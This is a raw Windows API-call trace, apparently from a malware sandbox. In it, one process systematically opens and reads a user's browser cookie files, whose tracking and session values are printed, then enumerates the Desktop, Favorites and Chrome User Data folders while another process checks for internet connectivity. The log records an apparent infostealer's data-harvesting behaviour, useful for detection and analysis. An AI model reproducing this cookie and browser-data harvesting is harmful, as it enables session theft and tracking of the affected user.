| 07:44:03,590 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@1053965053[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,590 | 504 | NtReadFile |
Buffer => Conversion
CosBQ1FOc2p5YmVzVTlTVUpJdUlwQVA0cVlLWURLT3Nxbjd4d3JpemJzbVc5QWtJQUJBQlVMT0ZwZTM2X19fX193Rmd5YzZIaVlpa2hCQ2dBZjMxeVBZRHlBRUJxZ1FaVDlCUmZ3TThtWVZ1R0c3UGpIbElnY0tJNVB4S3JSNXZCb0FINjRtM0NaQUhBdxITCMvxosHjmL8CFSxo7AodGD4AsxgAIOznta3Sq7bbVEgB
www.goog FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,590 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,610 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@127.0.0[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,610 | 504 | NtReadFile |
Buffer => s_pers
%20s_fid%3D69FDDE05407BDB86-1E9746AE5CCF9574%7C1467018481757%3B%20s_vs%3D1%7C1403861881787%3B%20s_nr%3D1403860081817-New%7C1435396081817%3B
127.0.0.1/
1600
1738681984
30527571
1277663376
30380519
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,610 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,610 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@adnxs[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,610 | 504 | NtReadFile |
Buffer => uuid2
8731886771279580431
adnxs.com/
9216
1364179200
30398550
1946964448
30380512
*
sess
1
adnxs.com/
9216
2458646784
30380646
1946964448
30380512
*
icu
ChII_pgOEAoYAiACKAIw-vCynQUQ-vCynQUYAQ..
adnxs.com/
9216
1364179200
30398550
1947064448
30380512
*
anj
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,610 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,620 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@adobe[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,620 | 504 | NtReadFile |
Buffer => s_vi
[CS]v1|29D65EC68507B15F-4000010EE001FA5C[CE]
adobe.com/
1024
839917312
30527303
1280773376
30380519
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,620 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,630 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@bing[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,630 | 504 | NtReadFile |
Buffer => MUID
0951E6C2770F610E19B3E0A47610617B
bing.com/
1024
1134688384
30527296
1583644448
30380512
*
OrigMUID
0951E6C2770F610E19B3E0A47610617B%2c4e505133c2254a0ab06e13f48a4a9722
bing.com/
1024
3589655680
30527295
4035761744
30380511
*
SRCHD
MS=3411377&SM=1&D=341 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,630 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,630 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@bluekai[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,630 | 504 | NtReadFile |
Buffer => bkc
KJpM8sJQtem5QuaTh8oQJQRsCrmte9h588CHIvjGdOQVCcG9YjRwj9==
bluekai.com/
1024
931285120
30416655
1895594448
30380512
*
bkdc
dal
bluekai.com/
1024
591285120
30416655
1560014448
30380512
*
bklc
53acb853
bluekai.com/
1024
931285120
30416655
1896394448
303805 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,630 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,640 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@browser[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,640 | 504 | NtReadFile |
Buffer => __utma
173272373.1257133377.1403856985.1403856985.1403856985.1
google.com/intl/en/chrome/browser/
1600
321879552
30527363
572094448
30380512
*
__utmb
173272373.4.9.1403856997112
google.com/intl/en/chrome/browser/
1600
1384395264
30380516
572094448
30380512 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,640 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,650 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@c.bing[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,650 | 504 | NtReadFile |
Buffer => SRM_B
0951E6C2770F610E19B3E0A47610617B
c.bing.com/
1024
1134688384
30527296
1584644448
30380512
*
SRM_M
0951E6C2770F610E19B3E0A47610617B
c.bing.com/
1024
3579655680
30527295
4023441744
30380511
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,650 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,660 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@c.msn[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,670 | 504 | NtReadFile |
Buffer => MR
0
c.msn.com/
1024
3694409216
30386479
4023941744
30380511
*
ANONCHK
0
c.msn.com/
1024
238646784
30380646
4023941744
30380511
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,670 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,670 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@c1.microsoft[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,670 | 504 | NtReadFile |
Buffer => MR
0
c1.microsoft.com/
1024
1259441920
30386480
1589154448
30380512
*
ANONCHK
0
c1.microsoft.com/
1024
2098646784
30380646
1591754448
30380512
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,680 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,680 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@chrome[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,680 | 504 | NtReadFile |
Buffer => __utma
173272373.292824954.1403856980.1403856980.1403856980.1
google.com/chrome/
1600
111879552
30527363
360184448
30380512
*
__utmb
173272373.2.9.1403856983582
google.com/chrome/
1600
1174395264
30380516
360184448
30380512
*
__utmz
173272373.1403856980.1. FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,680 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,680 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@doubleclick[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,690 | 504 | NtReadFile |
Buffer => id
22ccbcae88020083||t=1403828182|et=730|cs=002213fd488f9d60fc64ab04bd
doubleclick.net/
1024
4159655680
30527295
314224448
30380512
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,690 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,690 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@google[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,690 | 504 | NtReadFile |
Buffer => PREF
ID=3da61ab5058c41bf:U=8f19f8cbf8da5621:FF=0:TM=1403828154:LM=1403828169:S=6jHzLLIlK9T-Zsjt
google.com/
1536
4029655680
30527295
180624448
30380512
*
NID
67=lijpUNo73YymCOxKTLXHBadvIiEVFFhoNfALQjtAGmS1r3AE_36I837R663RumXpYsYfZZ8eAGfd1EpHpApJrl45U8pws8Z FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,690 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,700 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@microsoft[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,700 | 504 | NtReadFile |
Buffer => MC1
V=4&GUID=3d144cf72353497db6548158c9d46cac&HASH=&LV=&LU=1403828313456
microsoft.com/
1024
1174688384
30527296
1618594448
30380512
*
MUID
0951E6C2770F610E19B3E0A47610617B
microsoft.com/
1024
1144688384
30527296
1587854448
30380512
*
A
I&I=AxUFAAAAAACVBwA FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,700 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,700 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@msn[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,700 | 504 | NtReadFile |
Buffer => MC1
V=3&GUID=2c974a70dc1b431bac7477d0f088894b
msn.com/
1024
4251229184
30527496
3986491744
30380511
*
brdSample
0
msn.com/
1088
2396079104
30525351
1169044448
30380512
*
mh
MSFT
msn.com/
1024
3539655680
30527295
3986591744
30380511
*
CC
US
msn.com/
1024
35 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,710 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,710 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@privacy[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,710 | 504 | NtReadFile |
Buffer => __utma
173272373.514328313.1403856980.1403856980.1403856980.1
google.com/intl/en/chrome/browser/privacy/
1600
331879552
30527363
576994448
30380512
*
__utmb
173272373.3.10.1403856980
google.com/intl/en/chrome/browser/privacy/
1600
1394395264
30380516
57699 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,710 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,720 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@python[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,720 | 504 | NtReadFile |
Buffer => __utma
32101439.818556904.1403857025.1403857025.1403857025.1
python.org/
1600
531879552
30527363
778884448
30380512
*
__utmb
32101439.1.10.1403857025
python.org/
1600
1594395264
30380516
778984448
30380512
*
__utmz
32101439.1403857025.1.1.utmcsr=(direct)|u FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,720 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,720 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@scorecardresearch[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,720 | 504 | NtReadFile |
Buffer => UID
320a1f-23.67.246.24-1403828123
scorecardresearch.com/
1024
748887936
30525284
4017631744
30380511
*
UIDR
1403828123
scorecardresearch.com/
1024
748887936
30525284
4017631744
30380511
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,730 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,730 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@www.bing[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,730 | 504 | NtReadFile |
Buffer => MUIDB
0951E6C2770F610E19B3E0A47610617B
www.bing.com/
1024
3589655680
30527295
4035761744
30380511
*
SRCHUID
V=2&GUID=BCD5E0995E06400091A8437297EBD7DD
www.bing.com/
1024
3589655680
30527295
4035861744
30380511
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,730 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,730 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@www.msn[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,740 | 504 | NtReadFile |
Buffer => MUIDB
0951E6C2770F610E19B3E0A47610617B
www.msn.com/
1024
3539655680
30527295
3986891744
30380511
*
SRCHUID
V=2&GUID=D76E240B3D2349369D911662BEB7620A
www.msn.com/
1024
3539655680
30527295
3987091744
30380511
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,740 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,740 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Cookies\tdw@youtube[1].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,740 | 504 | NtReadFile |
Buffer => VISITOR_INFO1_LIVE
HEzk7nqHFxc
youtube.com/
1024
3828980608
30429427
321834448
30380512
*
FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:44:03,740 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:44:03,750 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,750 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,830 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Desktop\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:03,830 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01\xbf\xd0\xd9:\xaf\x91\xcf\x01\xc0\x1619oI\xcd\x01PKl\xb9\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:44:03,830 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,830 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,910 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:03,910 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:03,910 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:03,910 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:03,910 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:03,910 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Favorites\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:03,910 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\x03]\xb9\xd5I\xcd\x01`\xfc-(\xf2\x91\xcf\x01p6\x92\xbf\xd5I\xcd\x01p6\x92\xbf\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MICx\x00\x00\x00\x00\x00\x00\x00\xa0%\xd0\xbe\xd5I\xcd\x01\x80ae\xec\xdf\x91\xcf\x01\xa0%\xd0\xbe\xd5I\xcd\x01\xa0%\xd0\xbe\xd5I\xcd\x01z\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00`\xa3M\xbb\xd5I\xcd\x01\xd0\x95\x86\xc7\xe0\x91\xcf\x01`\xda\x99\xbf\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:03,910 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:03,990 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Favorites\Links\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:03,990 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xa3M\xbb\xd5I\xcd\x01\xd0\x95\x86\xc7\xe0\x91\xcf\x01`\xda\x99\xbf\xd5I\xcd\x01\xf0 \x11\xe3\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x88\x00\x00\x00\x00\x00\x00\x00\x00\xcc\x96\xbf\xd5I\xcd\x01\x00\xcc\x96\xbf\xd5I\xcd\x01\x00\xcc\x96\xbf\xd5I\xcd\x01\x00\xcc\x96\xbf\xd5I\xcd\x01w\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00U\x00S\x00T\x00O\x00M\x00~\x001\x00.\x00U\x00R\x00L\x00C\x00u\x00s\x00t\x00o\x00m\x00i\x00z\x00e\x00 \x00L\x00i\x00n\x00k\x00s\x00.\x00u\x00r\x00l\x00\xdf\x91\xcf\x01\x80\x00\x00\x00\x00\x00\x00\x000S\x98\xbf\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:03,990 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,990 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:03,990 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:04,261 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\*.* |
SUCCESS | 0x0016c100 | |
| 07:44:04,261 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x01\xc0%\xb0rX\x94\xcf\x01P\xac59oI\xcd\x01\xf0\x88\x9b2\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x80\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x01`\x91\x8c.\xe8\x91\xcf\x01\xf0\x88\x9b2\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00P\x00P\x00L\x00I\x00C\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00p\x00p\x00l\x00i\x00c\x00a\x00t\x00i\x00o\x00n\x00 \x00D\x00a\x00t\x00a\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xc0\xb5g\xb9\xd5I\xcd\x01\xf0\x88\x9b2\xf2\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:04,261 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:04,341 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:04,341 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\x90\x83/(\xf2\x91\xcf\x01`\x91\x8c.\xe8\x91\xcf\x01\xf0\x88\x9b2\xf2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.\x88\x00\x00\x00\x00\x00\x00\x00`\x91\x8c.\xe8\x91\xcf\x01`\x91\x8c.\xe8\x91\xcf\x01`\x91\x8c.\xe8\x91\xcf\x01`\x91\x8c.\xe8\x91\xcf\x01(0\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00&\x00\x00\x00\x00\x00\x00\x00\x18\x00G\x00D\x00I\x00P\x00F\x00O\x00~\x001\x00.\x00D\x00A\x00T\x00G\x00D\x00I\x00P\x00F\x00O\x00N\x00T\x00C\x00A\x00C\x00H\x00E\x00V\x001\x00.\x00D\x00A\x00T\x00\xdf\x91\xcf\x01p\x00\x00\x00\x00\x00\x00\x00\xc0R\xcf"\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:04,341 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:04,421 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:04,421 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0R\xcf"\xe0\x91\xcf\x01\xa0q\x02U\xe0\x91\xcf\x01@\xe5 T\xe0\x91\xcf\x01@\xe5 T\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 SRCHUp\x00\x00\x00\x00\x00\x00\x00@\xe5 T\xe0\x91\xcf\x01@\xe5 T\xe0\x91\xcf\x01@\xe5 T\xe0\x91\xcf\x01@\xe5 T\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00h\x00r\x00o\x00m\x00e\x00 \x00mz 3\x00\x00\x00\x00\x00\x00\x00\x00\xc0R\xcf"\xe0\x91\xcf\x01\xc0R\xcf"\xe0\x91\xcf\x01\xc0R\xcf"\xe0\x91\xcf\x01\xc0R\xcf"\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:04,421 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:04,501 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:04,511 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@\xe5 T\xe0\x91\xcf\x01@\xe5 T\xe0\x91\xcf\x01@\xe5 T\xe0\x91\xcf\x01@\xe5 T\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xe5 T\xe0\x91\xcf\x01\xe0E\x86\xe1\xe7\x91\xcf\x01\x90\xc7\x19\xe1\xe7\x91\xcf\x01\x90\xc7\x19\xe1\xe7\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x10\x00U\x00S\x00E\x00R\x00D\x00A\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00U\x00s\x00e\x00r\x00 \x00D\x00a\x00t\x00a\x00 |
SUCCESS | 0x00000000 | |
| 07:44:04,511 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:04,591 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\*.* |
SUCCESS | 0x00169d50 | |
| 07:44:04,601 | 504 | NtQueryDirectoryFile |
